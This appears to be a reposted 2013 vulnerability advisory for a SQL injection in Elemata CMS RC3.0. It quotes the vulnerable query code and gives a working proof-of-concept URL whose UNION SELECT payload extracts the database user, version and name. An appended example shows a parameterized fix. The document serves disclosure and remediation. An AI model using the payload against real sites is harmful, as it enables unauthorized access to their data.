
Elemata CMS RC3.0 (global.php, id param) SQL Injection and Fix

2013-06-25 15:35

# Title            : Elemata CMS RC3.0 SQL Injection
# Author           : CWH Underground
# Website          : www.2600.in.th
# Vendor URL       : http://www.elemata.com/
# Download         : http://jaist.dl.sourceforge.net/project/elematacms/Elemata%203.x/ElemataRC3.0.zip
# Affected version : RC 3.0
# Tested on        : Windows and Linux

    
##############################
Vulnerability: SQL Injection
##############################
    
/functions/global.php (LINE: 24-30)
    
----------------------------------------------------------------------------- 
function e_meta($id)
{
   include ("Connections/default.php");
   mysql_select_db($database_default, $default);
   $query_meta = "SELECT * FROM posts WHERE id = '$id'";
   $meta = mysql_query($query_meta, $default) or die(mysql_error());
   $row_meta = mysql_fetch_assoc($meta);
-----------------------------------------------------------------------------     
    
#####################################################
SQL Injection Overview
#####################################################
    
With this vulnerability, an attacker might execute arbitrary SQL commands on the database server.
User-tainted data is used to build the database query that is then executed by the database management system (DBMS).
An attacker can inject their own SQL syntax and thereby read, insert or delete database entries, or attack the underlying operating system,
depending on the query, the DBMS and its configuration.
   
POC:
   
http://www.hackdig.com /elemata/?id=-1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat%28user%28%29,0x3a3a,version%28%29,0x3a3a,database%28%29%29,NULL,NULL,NULL,NULL--+
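
The page shows the vulnerable e_meta() but no corrected version. The following is an added example, not code from the advisory or from the Elemata project: it contrasts the page's string-built query with a parameterized one. It assumes PDO with an in-memory SQLite database and a constructed three-column posts table standing in for the CMS's MySQL connection; the function names e_meta_concat and e_meta_safe are hypothetical.

```php
<?php
// Added example. Constructed in-memory SQLite database standing in for the
// CMS's MySQL connection; the three-column posts table is an assumption.
function demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT)");
    $db->exec("INSERT INTO posts VALUES (1, 'Hello', 'First post'), (2, 'Draft', 'Unpublished')");
    return $db;
}

// Same query construction as the page's e_meta(): $id is pasted into the SQL text.
function e_meta_concat(PDO $db, string $id): ?array
{
    $row = $db->query("SELECT * FROM posts WHERE id = '$id'")->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened form: reject non-numeric ids, then bind the value as a parameter
// so the query text never contains request data.
function e_meta_safe(PDO $db, string $id): ?array
{
    if (!ctype_digit($id)) {
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM posts WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = demo_db();
$tainted = "-1' OR id = '2";   // constructed input containing a quote

var_dump(e_meta_concat($db, '1')['title']);      // legitimate lookup
var_dump(e_meta_concat($db, $tainted)['title']); // the quote rewrites the WHERE clause
var_dump(e_meta_safe($db, '1')['title']);        // legitimate lookup still works
var_dump(e_meta_safe($db, $tainted));            // rejected before reaching SQL
```

In the CMS itself the same change means replacing the removed mysql_* calls with mysqli or PDO prepared statements; the digit check alone is not a substitute for binding.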
 

 

Source: www.2cto.com/Article/201306/222533.html
